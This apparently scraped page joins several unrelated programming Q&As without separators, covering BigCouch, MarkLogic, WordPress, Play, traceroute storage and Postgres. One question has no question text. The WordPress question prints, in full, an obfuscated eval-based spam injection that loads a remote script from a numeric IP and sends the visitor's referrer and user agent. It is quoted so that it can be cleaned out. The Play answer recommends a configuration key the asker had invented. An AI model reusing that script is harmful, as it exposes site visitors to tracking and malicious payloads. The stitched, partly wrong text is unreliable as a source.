I am new to BigCouch. I have successfully set up BigCouch on two different systems, and both are working perfectly fine.
On the first BigCouch I have some databases that I want replicated onto the other one. I copied all the shards from the first BigCouch to the second, and then used the clustering command to join them into a cluster:
curl -X PUT db01.yourhostname.com:5986/nodes/bigcouch@db02.yourhostname.com -d {}
It reports success, but when I try to create any new database I get an internal server error.
My first question: is copying the shards from one node to the other and then clustering them a correct way to do this? I am not sure, so can anyone tell me how to do it successfully, or what I am missing?
Thanks.
Check that both servers are aware of each other in the cluster by issuing the following on each:
curl 127.0.0.1:5984/_membership
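On a healthy two-node cluster both machines should report both node names. The response is JSON along these lines (the node names here are just an illustrative sketch; yours will differ):
{"all_nodes":["bigcouch@db01.yourhostname.com","bigcouch@db02.yourhostname.com"],"cluster_nodes":["bigcouch@db01.yourhostname.com","bigcouch@db02.yourhostname.com"]}
If db02 is missing from either list on either machine, the nodes aren't actually talking to each other yet.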
If that looks OK, try pinging from one server to the other using the FQDN to make sure it is resolvable. BigCouch assumes resolvable FQDNs by default.
Also, I've seen this happen when you try to change the FQDN, either in the Erlang node name or in the server hostname. There doesn't seem to be any coping mechanism for that.
I have multiple databases on my local machine that I do not need. Can I run a curl script or a REST API command to delete a database, its servers and all of its forests, so that I can use Gradle to just deploy them again?
I have tried manually deleting the server first, then the database and then the forests. This is a lengthy process.
I want a single command to do the whole job for me, instead of having to delete the components one by one, which is possible through the admin interface.
Wagner Michael has a fair point in his comment. If you already used (ml-)Gradle to create servers and databases, why not use its mlUndeploy -Pconfirm=true task to get rid of them? You could potentially even use a fake project, with stub configs to get rid of a fairly random set of databases and servers, though that still takes some manual work.
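For example, from the project root that holds your ml-gradle configuration (assuming the Gradle wrapper is checked in; use plain gradle otherwise):
./gradlew mlUndeploy -Pconfirm=true
That removes the app servers, databases and forests that the project's config files created, and you can then run mlDeploy to recreate them from scratch.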
By far the quickest way to reset your entire MarkLogic instance is to stop it and wipe its data directory. This SO answer gives instructions on how to do that, as part of a solution for recovering a lost admin password:
https://stackoverflow.com/a/27803923/918496
HTH!
I am working on a website that was recently hacked with a spam injection. Everything is secured now, but I am tasked with cleaning up the remains of a script that was put on each page. The problem I am facing is that special characters are used throughout the hack, and escaping them is proving to be very challenging.
I am also using a query builder, but even that is getting confused.
The code I am trying to remove is this:
<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinsz|var|u0026u|referrer|bhsyf||js|php'.split('|'),0,{}))
As you can see, once I start escaping characters I get lost. I was wondering if anyone has come across this and found an easier way.
I have successfully gone in and manually deleted the code directly in the database, but unfortunately there are about 1006 locations and it just takes forever.
Unfortunately, modifying a WordPress database with direct SQL queries can break PHP serialized strings and objects. So even if you come up with the perfect search term, don't do it that way.
Instead, you might try this awesome Search Replace DB tool. Make sure you follow all of their pleas about cautious use of the script, especially: do a backup first, use a very cryptic directory name, and remove the folder as soon as you're done. Also make sure you have php-mbstring running.
The web interface is really nice, but depending on the server setup, it can fail to work. There's also a command line interface, though. To use it, cd into the folder that has the tool. There's documentation for the CLI version in the README.md file. Here's the basic shape of a command to address your case, which you'll need to test and adjust to match your database setup:
php srdb.cli.php --host localhost.or.dbserver --name dbnamehere --user dbuserhere --pass 'dbpasswordhere' --search '/\<noindex\>\<script id\=\"wpinfo\-pst1\".*?<\\/noindex>/s' --replace '' --regex --dry-run
I love this tool's --dry-run feature, which is set in the command above. After you've done lots of dry runs and are confident you're doing what you intend to do, remove that option from the command line (or uncheck the "dry run" box if you're in the web interface) and the replace will actually happen. Then, remember, remove the tool so that no one else can use it.
Say I have a database called "awesome" which is located on a live server and at the same time duplicated on a staging server for testing. My web app is based on Play 2.1.1 using Scala.
So I have these datasources defined in my application.conf file:
db.awesome-test.driver= com.mysql.jdbc.Driver
db.awesome-test.url="jdbc:mysql://127.0.1.1/awesome"
db.awesome-test.user=mr_awesome_tester
db.awesome-test.password=justtesting
db.awesome-live.driver= com.mysql.jdbc.Driver
db.awesome-live.url="jdbc:mysql://127.0.0.1/awesome"
db.awesome-live.user=mr_awesome
db.awesome-live.password=omgthisisawesome
Depending on which environment I am on, I would like to use either DB.withConnection("awesome-test") or DB.withConnection("awesome-live"). I am controlling this via another value in my config: e.g. I put environment=awesome-live in there and then read the respective connection name via Play.configuration.
Now, the problem is that Play apparently attempts to create a DB connection for each datasource defined in the config right away. A) This fails depending on which environment I am on; e.g. on the staging machine I will get something like this (the pic is only a mock-up, of course) because the live DB is not reachable:
...although it is completely unnecessary to try to connect to that DB, because it will never be used in this environment. B) Even if the connection did work, it would of course not be feasible to create two connections (live and testing) when only one of the two is ever needed.
Is there a way to tell Play to defer/postpone creation of the DB connection until it is actually needed (e.g. when DB.getConnection("...") or DB.withConnection("...") is called for that datasource)?
I am thinking something like db.awesome-live.deferCreation=true.
Cheers, Alex
I'd say that you have two ways of doing this.
Everything is explained in the Play! documentation: Additional configuration
Specifying alternative configuration file
test.conf
db.awesome.driver= com.mysql.jdbc.Driver
db.awesome.url="jdbc:mysql://127.0.1.1/awesome"
db.awesome.user=mr_awesome_tester
db.awesome.password=justtesting
live.conf
db.awesome.driver= com.mysql.jdbc.Driver
db.awesome.url="jdbc:mysql://127.0.0.1/awesome"
db.awesome.user=mr_awesome
db.awesome.password=omgthisisawesome
In code you always use DB.withConnection("awesome").
Start the application with
$ start -Dconfig.resource=test.conf
or
$ start -Dconfig.resource=live.conf
Overriding specific configuration keys
In your case that means:
$ start -Ddb.awesome-live.deferCreation=true
One traceroute record may include:
Timestamp, with millisecond resolution.
Variable number of hops.
Each hop contains an IP address, hostname and RTT.
Overall result, e.g. successful, network unreachable, timed out.
Thanks.
I would use a database. You could use SQLite if you don't want to run a database server.
More details:
There is this nice little SQLite add-on for Firefox:
https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager
That should help you set things up. I would create a field for each of the values you want to store, perhaps one for the entire raw result, and a primary key "id" field.
Getting your data into the database will be the least trivial part. If you're running Linux, you could write a bash shell script that captures the output of traceroute and calls a PHP CLI script that inserts the data into the DB. Of course, you can use Python or any other language you like that supports your DB.
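To make that concrete, here is a rough Python sketch that runs traceroute, parses the hop lines and stores one record per run in SQLite. The file name, target host, table layout and parsing regex are my own assumptions, so adjust them to the exact traceroute output on your system:
#!/usr/bin/env python3
"""Sketch: run traceroute, parse it, store one record per run in SQLite."""
import re
import sqlite3
import subprocess
from datetime import datetime

DB_PATH = "traceroute.db"   # hypothetical database file
TARGET = "example.com"      # hypothetical target host

SCHEMA = """
CREATE TABLE IF NOT EXISTS runs (
    id         INTEGER PRIMARY KEY AUTOINCREMENT,
    ts         TEXT NOT NULL,       -- timestamp, millisecond resolution
    target     TEXT NOT NULL,
    result     TEXT NOT NULL,       -- e.g. successful / failed
    raw_output TEXT NOT NULL        -- entire traceroute output, just in case
);
CREATE TABLE IF NOT EXISTS hops (
    run_id   INTEGER NOT NULL REFERENCES runs(id),
    hop_no   INTEGER NOT NULL,
    ip       TEXT,
    hostname TEXT,
    rtt_ms   REAL
);
"""

# Matches lines like: " 3  router.example.net (10.0.0.1)  12.345 ms ..."
HOP_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+\(([\d.]+)\)\s+([\d.]+)\s+ms")

def run_traceroute(target):
    proc = subprocess.run(["traceroute", target], capture_output=True, text=True)
    return proc.stdout

def store(conn, target, output):
    hops = []
    for line in output.splitlines():
        m = HOP_RE.match(line)
        if m:
            hops.append((int(m.group(1)), m.group(3), m.group(2), float(m.group(4))))
    result = "successful" if hops else "failed"   # crude; refine as needed
    cur = conn.execute(
        "INSERT INTO runs (ts, target, result, raw_output) VALUES (?, ?, ?, ?)",
        (datetime.now().isoformat(timespec="milliseconds"), target, result, output))
    run_id = cur.lastrowid
    conn.executemany(
        "INSERT INTO hops (run_id, hop_no, ip, hostname, rtt_ms) VALUES (?, ?, ?, ?, ?)",
        [(run_id, n, ip, host, rtt) for n, ip, host, rtt in hops])
    conn.commit()

if __name__ == "__main__":
    conn = sqlite3.connect(DB_PATH)
    conn.executescript(SCHEMA)
    store(conn, TARGET, run_traceroute(TARGET))
    conn.close()
You could run this from cron at whatever interval you need, and then browse the results with the Firefox SQLite add-on mentioned above.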
I want to cut Postgres down to its minimal size so that I can ship just the database functionality with my application. I'm using Portable PostgreSQL, which I found on the internet.
Any suggestions as to what I can delete from the Postgres installation that is not needed for normal database use?
You can delete all the standalone tools in bin/ - it can all be done with psql. Keep anything that starts with pg_, plus postgres, initdb and psql itself.
You can probably delete a bunch of the conversions in lib/ (the some_and_some.so files), but probably not until after you've run initdb. And be careful not to delete one you'll be using at some point - they are dynamically loaded, so you won't notice until, for example, a client connects with a different encoding.
But note that this probably won't get you much - on my system, with debug enabled etc., the binaries take 17 MB. A clean data directory with no data at all in it takes 33 MB, about twice as much, and you will need that if you're going to be able to use your database at all.
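As a rough sketch of that cleanup (the paths are assumptions about a typical install layout; list the candidates and take a backup before deleting anything):
cd /path/to/portable-postgres
# review the standalone tools shipped in bin/; keep postgres, initdb, psql and the pg_* utilities
ls bin
# after running initdb, the encoding conversion libraries look like this; remove only ones for encodings you will never use
ls lib | grep '_and_'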